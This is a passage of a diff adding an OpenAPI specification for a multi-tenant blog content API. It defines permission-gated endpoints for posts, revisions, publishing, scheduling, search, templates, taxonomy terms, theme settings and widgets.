+                    enum:
+                      - true
+                  data:
+                    type: object
+                    properties:
+                      pageId:
+                        type: string
+                        format: uuid
+                      qualityChecklist:
+                        $ref: "#/components/schemas/ContentQualityChecklistResult"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/posts:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogListPosts
+      summary: List this tenant's non-deleted blog posts
+      description: Gated by blog_content.posts.read. Optional ?status= filter, ?limit= bounded (default 20, max 100).
+      parameters:
+        - name: status
+          in: query
+          schema:
+            type: string
+            enum:
+              - draft
+              - review
+              - scheduled
+              - published
+              - archived
+        - name: limit
+          in: query
+          schema:
+            type: integer
+            minimum: 1
+            maximum: 100
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Matching posts.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+                    properties:
+                      posts:
+                        type: array
+                        items:
+                          $ref: "#/components/schemas/BlogPost"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    post:
+      tags:
+        - Blog Content
+      operationId: blogCreatePost
+      summary: Create a draft blog post
+      description: Gated by blog_content.posts.create. Not idempotency-keyed (a retry duplicating a create is caught by the (tenant_id, locale, slug) partial unique index).
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/BlogPostWriteInput"
+      responses:
+        "200":
+          description: Post created.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogPost"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "409":
+          description: A post already exists for this slug/locale, or the referenced media is not R2-verified in full-online R2-only mode (422 for the latter).
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "422":
+          description: One or more image/video-thumbnail references are not valid R2 media objects in full-online R2-only mode.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/posts/{id}:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    get:
+      tags:
+        - Blog Content
+      operationId: blogGetPost
+      summary: Read one blog post
+      description: Gated by blog_content.posts.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The post.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogPost"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdatePost
+      summary: Update a blog post
+      description: Gated by blog_content.posts.update (with an ownership carve-out — a draft's own author may update it without the broader permission). Only fields present in the body are changed. A significant title/contentJson/contentText change snapshots an append-only revision first.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/BlogPostWriteInput"
+      responses:
+        "200":
+          description: Post updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogPost"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "422":
+          description: One or more image/video-thumbnail references are not valid R2 media objects in full-online R2-only mode.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+    delete:
+      tags:
+        - Blog Content
+      operationId: blogDeletePost
+      summary: Soft delete a blog post
+      description: Gated by blog_content.posts.delete. Soft delete only (deleted_at/deleted_by/delete_reason) — see POST .../purge for the permanent, high-risk purge.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Post soft-deleted.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogPost"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/posts/{id}/archive:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    post:
+      tags:
+        - Blog Content
+      operationId: blogArchivePost
+      summary: Archive a blog post
+      description: Gated by blog_content.posts.archive. High-risk, requires Idempotency-Key.
+      parameters:
+        - name: Idempotency-Key
+          in: header
+          required: true
+          schema:
+            type: string
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Post archived (or an idempotent replay).
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogPost"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: Invalid status transition, or the Idempotency-Key was already used with a different request.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/posts/{id}/internal-links/preview:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    get:
+      tags:
+        - Blog Content
+      operationId: blogPreviewPostInternalLinks
+      summary: Preview automatic internal tag linking for a post
+      description: Read-only preview of which tags would be automatically linked in this post's rendered content before publishing. Gated by blog_content.internal_links.preview.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The preview result.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+                    properties:
+                      postId:
+                        type: string
+                        format: uuid
+                      enabled:
+                        type: boolean
+                      disabledReason:
+                        type: string
+                        nullable: true
+                        enum:
+                          - deployment_disabled
+                          - tenant_disabled
+                          - post_disabled
+                          - null
+                      matches:
+                        type: array
+                        items:
+                          type: object
+                      totalLinked:
+                        type: integer
+                      maxPerPost:
+                        type: integer
+                      maxPerTag:
+                        type: integer
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/posts/{id}/publish:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    post:
+      tags:
+        - Blog Content
+      operationId: blogPublishPost
+      summary: Publish a blog post
+      description: Gated by blog_content.posts.publish (no ownership carve-out). High-risk, requires Idempotency-Key. Blocked (422) if the content quality checklist fails when full-online R2-only mode is active for the tenant. On success, also invokes the social-publishing outbox hook (a documented no-op in this base — social_publishing is not ported).
+      parameters:
+        - name: Idempotency-Key
+          in: header
+          required: true
+          schema:
+            type: string
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Post published (or an idempotent replay).
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: Invalid status transition, or the Idempotency-Key was already used with a different request.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "422":
+          description: Publish is blocked by the content quality checklist.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/posts/{id}/purge:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    post:
+      tags:
+        - Blog Content
+      operationId: blogPurgePost
+      summary: Permanently purge a soft-deleted blog post
+      description: Gated by blog_content.posts.purge. High-risk, irreversible, requires Idempotency-Key. Only a previously soft-deleted post may be purged.
+      parameters:
+        - name: Idempotency-Key
+          in: header
+          required: true
+          schema:
+            type: string
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Post purged (or an idempotent replay).
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: The post is not soft-deleted, or the Idempotency-Key was already used with a different request.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/posts/{id}/quality-checklist:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    get:
+      tags:
+        - Blog Content
+      operationId: blogGetPostQualityChecklist
+      summary: Preview the content quality checklist for a post
+      description: Read-only preview for the admin editor — runs the exact same evaluator POST .../publish and .../schedule enforce. Gated by blog_content.posts.read (no separate permission).
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The checklist result.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+                    properties:
+                      postId:
+                        type: string
+                        format: uuid
+                      qualityChecklist:
+                        $ref: "#/components/schemas/ContentQualityChecklistResult"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/posts/{id}/restore:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    post:
+      tags:
+        - Blog Content
+      operationId: blogRestorePost
+      summary: Restore a soft-deleted blog post
+      description: Gated by blog_content.posts.restore. High-risk, requires Idempotency-Key.
+      parameters:
+        - name: Idempotency-Key
+          in: header
+          required: true
+          schema:
+            type: string
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Post restored (or an idempotent replay).
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogPost"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: The Idempotency-Key was already used with a different request.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/posts/{id}/revisions:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    get:
+      tags:
+        - Blog Content
+      operationId: blogListPostRevisions
+      summary: List a post's revision history
+      description: Gated by blog_content.revisions.read. Newest first.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The revision list.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+                    properties:
+                      revisions:
+                        type: array
+                        items:
+                          $ref: "#/components/schemas/BlogRevision"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/posts/{id}/revisions/{revisionId}:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+      - name: revisionId
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    get:
+      tags:
+        - Blog Content
+      operationId: blogGetPostRevision
+      summary: Read one revision of a post
+      description: Gated by blog_content.revisions.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The revision.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogRevision"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/posts/{id}/revisions/{revisionId}/restore:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+      - name: revisionId
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    post:
+      tags:
+        - Blog Content
+      operationId: blogRestorePostRevision
+      summary: Restore a post to an earlier revision
+      description: Gated by blog_content.revisions.restore. High-risk, requires Idempotency-Key. Restoring APPENDS a new revision snapshot of the restored content — it never overwrites or removes the revision being restored from.
+      parameters:
+        - name: Idempotency-Key
+          in: header
+          required: true
+          schema:
+            type: string
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Post restored to the given revision (or an idempotent replay).
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogPost"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: The Idempotency-Key was already used with a different request.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "422":
+          description: One or more image/video-thumbnail references in the restored content are not valid R2 media objects in full-online R2-only mode.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/posts/{id}/schedule:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    post:
+      tags:
+        - Blog Content
+      operationId: blogSchedulePost
+      summary: Schedule a blog post for future publishing
+      description: Gated by blog_content.posts.schedule. High-risk, requires Idempotency-Key. Same content quality checklist gate as publish. The blog:publish:scheduled job later performs the actual publish once scheduledAt <= now().
+      parameters:
+        - name: Idempotency-Key
+          in: header
+          required: true
+          schema:
+            type: string
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              required:
+                - scheduledAt
+              properties:
+                scheduledAt:
+                  type: string
+                  format: date-time
+      responses:
+        "200":
+          description: Post scheduled (or an idempotent replay).
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: Invalid status transition, or the Idempotency-Key was already used with a different request.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "422":
+          description: Scheduling is blocked by the content quality checklist.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/posts/{id}/submit-review:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    post:
+      tags:
+        - Blog Content
+      operationId: blogSubmitPostForReview
+      summary: Submit a draft post for review
+      description: Transitions draft -> review. Gated by blog_content.posts.update (same ownership carve-out as PATCH .../{id}). Not idempotency-keyed — the status transition is naturally idempotent.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Post submitted for review.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogPost"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: The post's current status cannot transition to review.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/search:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogSearchContent
+      summary: Full-text search across posts and pages
+      description: Gated by blog_content.search.read. May return content of any status per the caller's granted permission. Keyset-paginated (?cursor=).
+      parameters:
+        - name: q
+          in: query
+          required: true
+          schema:
+            type: string
+        - name: resourceType
+          in: query
+          schema:
+            type: string
+            enum:
+              - post
+              - page
+        - name: status
+          in: query
+          schema:
+            type: string
+            enum:
+              - draft
+              - review
+              - scheduled
+              - published
+              - archived
+        - name: cursor
+          in: query
+          schema:
+            type: string
+        - name: limit
+          in: query
+          schema:
+            type: integer
+            minimum: 1
+            maximum: 100
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Matching results.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+                    properties:
+                      items:
+                        type: array
+                        items:
+                          type: object
+                      nextCursor:
+                        type: string
+                        nullable: true
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+  /api/v1/blog/settings:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogGetSettings
+      summary: Read this tenant's blog settings
+      description: Gated by blog_content.settings.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The tenant's blog settings.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogSettings"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdateSettings
+      summary: Update this tenant's blog settings
+      description: Gated by blog_content.settings.configure. Only fields present in the body are changed.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+      responses:
+        "200":
+          description: Settings updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogSettings"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+  /api/v1/blog/templates:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogListTemplates
+      summary: List this tenant's presentation templates
+      description: Gated by blog_content.templates.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Matching templates.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+                    properties:
+                      templates:
+                        type: array
+                        items:
+                          type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    post:
+      tags:
+        - Blog Content
+      operationId: blogCreateTemplate
+      summary: Create a presentation template
+      description: "Gated by blog_content.templates.configure. layoutJson is a whitelisted shape: { columns: 1|2|3, sidebarPosition: left|right|none }."
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              required:
+                - key
+                - name
+              properties:
+                key:
+                  type: string
+                name:
+                  type: string
+                layoutJson:
+                  type: object
+                isActive:
+                  type: boolean
+      responses:
+        "200":
+          description: Template created.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "409":
+          description: A template already exists for this key.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/templates/{id}:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdateTemplate
+      summary: Update a presentation template
+      description: Gated by blog_content.templates.configure.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              properties:
+                name:
+                  type: string
+                layoutJson:
+                  type: object
+                isActive:
+                  type: boolean
+      responses:
+        "200":
+          description: Template updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+    delete:
+      tags:
+        - Blog Content
+      operationId: blogDeleteTemplate
+      summary: Soft delete a presentation template
+      description: Gated by blog_content.templates.configure.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Template soft-deleted.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/terms:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogListTerms
+      summary: List this tenant's categories/tags
+      description: Gated by blog_content.taxonomies.read. Optional ?taxonomyType= filter.
+      parameters:
+        - name: taxonomyType
+          in: query
+          schema:
+            type: string
+            enum:
+              - category
+              - tag
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Matching terms.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+                    properties:
+                      terms:
+                        type: array
+                        items:
+                          $ref: "#/components/schemas/BlogTerm"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    post:
+      tags:
+        - Blog Content
+      operationId: blogCreateTerm
+      summary: Create a category or tag
+      description: Gated by blog_content.taxonomies.configure. A tag must never carry a parentId.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/BlogTermWriteInput"
+      responses:
+        "200":
+          description: Term created.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogTerm"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "409":
+          description: A term already exists for this taxonomyType/slug.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/terms/{id}:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdateTerm
+      summary: Update a category or tag
+      description: Gated by blog_content.taxonomies.configure.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/BlogTermWriteInput"
+      responses:
+        "200":
+          description: Term updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogTerm"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+    delete:
+      tags:
+        - Blog Content
+      operationId: blogDeleteTerm
+      summary: Soft delete a category or tag
+      description: Gated by blog_content.taxonomies.configure.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Term soft-deleted.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/BlogTerm"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/theme:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogGetTheme
+      summary: Read this tenant's blog theme mode setting
+      description: Gated by blog_content.theme.read. Absence of a row means "inherit the tenant's default_theme".
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The theme setting.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+                    properties:
+                      mode:
+                        type: string
+                        enum:
+                          - light
+                          - dark
+                          - system
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdateTheme
+      summary: Update this tenant's blog theme mode setting
+      description: Gated by blog_content.theme.configure.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              required:
+                - mode
+              properties:
+                mode:
+                  type: string
+                  enum:
+                    - light
+                    - dark
+                    - system
+      responses:
+        "200":
+          description: Theme setting updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+                    properties:
+                      mode:
+                        type: string
+                        enum:
+                          - light
+                          - dark
+                          - system
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+  /api/v1/blog/widgets:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogListWidgets
+      summary: List this tenant's widgets
+      description: Gated by blog_content.widgets.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Matching widgets.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+                    properties:
+                      widgets:
+                        type: array
+                        items:
+                          type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    post:
+      tags:
+        - Blog Content
+      operationId: blogCreateWidget
+      summary: Create a widget
+      description: Gated by blog_content.widgets.configure. bodyText is plain text, escaped at render time (no raw-HTML field).
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              required:
+                - position
+                - title
+              properties:
+                position:
+                  type: string
+                  enum:
+                    - header
+                    - sidebar
+                    - footer
+                    - content_before
+                    - content_after
+                title:
+                  type: string
+                bodyText:
+                  type: string
+                isActive:
+                  type: boolean
+                sortOrder:
+                  type: integer
+      responses:
+        "200":
+          description: Widget created.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+  /api/v1/blog/widgets/{id}:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdateWidget
+      summary: Update a widget
+      description: Gated by blog_content.widgets.configure.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              properties:
+                position:
+                  type: string
+                  enum:
+                    - header
+                    - sidebar
+                    - footer
+                    - content_before
+                    - content_after
+                title:
+                  type: string
+                bodyText:
